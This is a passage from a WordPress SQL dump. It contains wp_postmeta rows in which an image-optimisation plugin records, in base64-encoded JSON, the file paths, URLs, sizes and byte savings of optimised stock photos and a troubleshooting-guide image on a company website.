GUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18zNTg0NDc4MjAtMS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18zNTg0NDc4MjAtMS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18zNTg0NDc4MjAtMS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzQyNSwiaWQiOjI5Mzd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzM1ODQ0NzgyMC0xLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzM1ODQ0NzgyMC0xLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzM1ODQ0NzgyMC0xLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3NDI5LCJpZCI6MjkzN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMzU4NDQ3ODIwLTEtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMzU4NDQ3ODIwLTEtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMzU4NDQ3ODIwLTEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDc0MzQsImlkIjoyOTM3fV0='); 
INSERT INTO `wp_postmeta` VALUES (28746, 2924, 'wpfc_optimisation_reduction', '72960'); 
INSERT INTO `wp_postmeta` VALUES (28747, 2924, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvUmVsZWFTeXMtVHJvdWJsZXNob290aW5nLUd1aWRlLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvUmVsZWFTeXMtVHJvdWJsZXNob290aW5nLUd1aWRlLmpwZyIsIndpZHRoIjo4MzAsImhlaWdodCI6ODcyLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvUmVsZWFTeXMtVHJvdWJsZXNob290aW5nLUd1aWRlLmpwZyIsInJlZHVjdGlvbiI6NzI5NTYsInRpbWUiOjE0ODM1NDc0NDQsImlkIjoiMjkyNCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvUmVsZWFTeXMtVHJvdWJsZXNob290aW5nLUd1aWRlLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvUmVsZWFTeXMtVHJvdWJsZXNob290aW5nLUd1aWRlLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvUmVsZWFTeXMtVHJvdWJsZXNob290aW5nLUd1aWRlLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3NDQ2LCJpZCI6MjkyNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9SZWxlYVN5cy1Ucm91Ymxlc2hvb3RpbmctR3VpZGUtNzYxeDgwMC5qcGciLCJ3aWR0aCI6NzYxLCJoZWlnaHQiOjgwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9SZWxlYVN5cy1Ucm91Ymxlc2hvb3RpbmctR3VpZGUtNzYxeDgwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9SZWxlYVN5cy1Ucm91Ymxlc2hvb3RpbmctR3VpZGUtNzYxeDgwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDc0NTAsImlkIjoyOTI0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL1JlbGVhU3lzLVRyb3VibGVzaG9vdGluZy1HdWlkZS03Njh4ODA3LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6ODA3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL1JlbGVhU3lzLVRyb3VibGVzaG9vdGluZy1HdWlkZS03Njh4ODA3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL1JlbGVhU3lzLVRyb3VibGVzaG9vdGluZy1HdWlkZS03Njh4ODA3LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzQ1NCwiaWQiOjI5MjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvUmVsZWFTeXMtVHJvdWJsZXNob290aW5nLUd1aWRlLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvUmVsZWFTeXMtVHJvdWJsZXNob290aW5nLUd1aWRlLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvUmVsZWFTeXMtVHJvdWJsZXNob290aW5nLUd1aWRlLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3NDU4LCJpZCI6MjkyNH1d'); 
INSERT INTO `wp_postmeta` VALUES (28748, 2888, 'wpfc_optimisation_reduction', '541541'); 
INSERT INTO `wp_postmeta` VALUES (28749, 2888, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzI1OTA0NTk1NS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18yNTkwNDU5NTUuanBnIiwid2lkdGgiOjEwMDAsImhlaWdodCI6NjY3LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzI1OTA0NTk1NS5qcGciLCJyZWR1Y3Rpb24iOjU0MTUzNCwidGltZSI6MTQ4MzU0NzQ3NSwiaWQiOiIyODg4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMjU5MDQ1OTU1LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzI1OTA0NTk1NS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18yNTkwNDU5NTUtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDc0NzksImlkIjoyODg4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18yNTkwNDU5NTUtODAweDUzNC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMjU5MDQ1OTU1LTgwMHg1MzQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzI1OTA0NTk1NS04MDB4NTM0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzQ4MiwiaWQiOjI4ODh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzI1OTA0NTk1NS03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18yNTkwNDU5NTUtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMjU5MDQ1OTU1LTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3NDg1LCJpZCI6Mjg4OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMjU5MDQ1OTU1LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzI1OTA0NTk1NS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18yNTkwNDU5NTUtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDc0ODksImlkIjoyODg4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18yNTkwNDU5NTUtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMjU5MDQ1OTU1LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzI1OTA0NTk1NS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzQ5MiwiaWQiOjI4ODh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzI1OTA0NTk1NS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18yNTkwNDU5NTUtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMjU5MDQ1OTU1LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3NDk1LCJpZCI6Mjg4OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMjU5MDQ1OTU1LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzI1OTA0NTk1NS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18yNTkwNDU5NTUtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDc0OTcsImlkIjoyODg4fV0='); 
INSERT INTO `wp_postmeta` VALUES (28750, 2872, 'wpfc_optimisation_reduction', '498612'); 
INSERT INTO `wp_postmeta` VALUES (28751, 2872, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzQwNzgwMjA1NS0xLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzQwNzgwMjA1NS0xLmpwZyIsIndpZHRoIjoxMDAwLCJoZWlnaHQiOjY2NywibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja180MDc4MDIwNTUtMS5qcGciLCJyZWR1Y3Rpb24iOjQ5ODYwNSwidGltZSI6MTQ4MzU0NzUwNywiaWQiOiIyODcyIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNDA3ODAyMDU1LTEtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNDA3ODAyMDU1LTEtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNDA3ODAyMDU1LTEtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDc1MTAsImlkIjoyODcyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja180MDc4MDIwNTUtMS04MDB4NTM0LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTM0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja180MDc4MDIwNTUtMS04MDB4NTM0LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja180MDc4MDIwNTUtMS04MDB4NTM0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzUxMiwiaWQiOjI4NzJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzQwNzgwMjA1NS0xLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzQwNzgwMjA1NS0xLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzQwNzgwMjA1NS0xLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3NTE1LCJpZCI6Mjg3Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNDA3ODAyMDU1LTEtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNDA3ODAyMDU1LTEtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNDA3ODAyMDU1LTEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDc1MTcsImlkIjoyODcyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja180MDc4MDIwNTUtMS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja180MDc4MDIwNTUtMS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja180MDc4MDIwNTUtMS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzUxOSwiaWQiOjI4NzJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzQwNzgwMjA1NS0xLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzQwNzgwMjA1NS0xLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzQwNzgwMjA1NS0xLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3NTI1LCJpZCI6Mjg3Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNDA3ODAyMDU1LTEtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNDA3ODAyMDU1LTEtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNDA3ODAyMDU1LTEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDc1MjgsImlkIjoyODcyfV0='); 
INSERT INTO `wp_postmeta` VALUES (28752, 2802, 'wpfc_optimisation_reduction', '16892'); 
